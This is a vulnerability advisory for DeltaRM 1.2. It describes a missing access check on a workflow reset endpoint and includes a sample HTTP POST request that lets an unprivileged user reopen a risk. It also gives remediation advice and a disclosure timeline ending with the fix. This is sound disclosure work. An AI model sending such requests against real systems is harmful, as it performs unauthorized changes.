=======================================================================
- Broken Access Controls in Reopen Risks
- Affected Product: DeltaRM 1.2
- Vendor: DeltaRM
- Severity: High
- Vulnerability Class: Broken Access Controls
- Status: Fixed
- Author(s): Renato Cruz =======================================================================
The /risque/risque/workflow/reset endpoint is lacking access controls, and it is possible for an unprivileged user to reopen a risk with a POST request, using the risqueID parameter to identify the risk to be re-opened.
As an authenticated user, send the following request
POST /risque/risque/workflow/reset HTTP/1.1
Host: deltarm.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=*unprivileged user session id*
risqueId=*risk id*
The application needs to validate the current user roles and permissions, and guarantee that the user only has access to the expected allowed features and context.
- With the exception of public resources, deny by default.
- Log access control failures, alert admins when appropriate (e.g. repeated failures).
- Rate limit API and controller access to minimize the harm from automated attack tooling.
- JWT tokens should be invalidated on the server after logout.
- Developers and QA staff should include functional access control unit and integration tests.
- 26-10-2021: Vulnerability disclosed to DeltaRM
- 28-10-2021: Acknowlegement from vendor
- 11-12-2021: Fix released by the vendor
- 10-01-2022: Retest performed, vulnerability fixed